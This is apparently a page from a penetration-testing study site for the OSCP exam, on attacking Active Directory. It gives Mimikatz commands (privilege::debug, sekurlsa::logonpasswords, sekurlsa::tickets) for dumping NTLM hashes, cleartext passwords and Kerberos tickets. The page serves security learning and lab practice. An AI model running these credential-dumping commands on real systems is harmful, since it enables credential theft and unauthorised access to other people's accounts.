Tips To Secure
Ctrlk
  • Begin
    • Scanning Port
    • SMB Enumeration
    • SNMP Enumeration
    • FTP enumeration
    • PS Reverse Shell Python base64
    • Directory Traversal
    • File Inclusion Vulnerability
    • File Upload
    • OS Command Injection
    • Phishing for Access
    • SQL injection
    • Word Press
    • Information gathering
    • RPC Enumeration
  • POST exploitation
    • Windows Privilege escalation
    • Linux Privilege Escalation
    • Port Redirection and SSH Tunneling
    • Tunneling Through Deep Packet Inspection
    • Collecting data
  • Reference (See)
  • Metasploit
    • Metasploit Cheat Sheet
  • Active directory
    • Manual Enumeration
    • Automated Tool for enumeration.
    • Attacking AD
      • Password Spraying
      • AS-REP Roasting
      • Kerberoasting
      • Silver Tickets
      • Domain controller synchronization (Dcsync attack)
    • Lateral Movement in AD
    • Active Directory Persistence
  • General
    • Other CheatSheet for OSCP
    • Offsec allowed list of tools
    • Tmux
    • Online practice links
  • Web Pentesting
    • Clickjacking
    • XXS Attack
Powered by GitBook
On this page
  1. Active directory

Attacking AD

Diagram of NTLM authentication in Active Directory
Diagram of Kerberos Authentication

Fetching Cached AD Credentials

LogoPage not found - HackTricksbook.hacktricks.xyz
LogoMimikatz - HackTricksbook.hacktricks.xyz
LogoAttacks & Defenses: Dumping LSASS With No MimikatzCyber Advisors, Inc.
LogoGitHub - ParrotSec/mimikatzGitHub
Logomimikatz Tool | Tools | Tips To Securehacking.tipstosecure.com
Learn more about this Tool

PreviousAutomated Tool for enumeration.NextPassword Spraying

Last updated 1 year ago

# To run mimikatz we need system user access.
# below are the command that we can use in mimikartz

# you can clone mimikatz from above git repo.
git clone https://github.com/ParrotSec/mimikatz
# or search in kali linux
locate mimikatz.exe

# to engage the SeDebugPrivlege8 privilege, which will allow us to interact with a process owned by another account.
privilege::debug

# dump hashes for all users logged on to the current workstation or server, including remote logins like Remote Desktop sessions
sekurlsa::logonpasswords
# From here we can find NTLM hash which can be used to connect to the system later.
#  When WDigest is enabled, running Mimikatz will reveal cleartext passwords alongside the password hashes.


-------------------------

# Other way: 
# Example:
# List smb share.
dir \\web04.corp.com\backup
# Ticket will be generated and saved. We can fatch the ticket using below command:
sekurlsa::tickets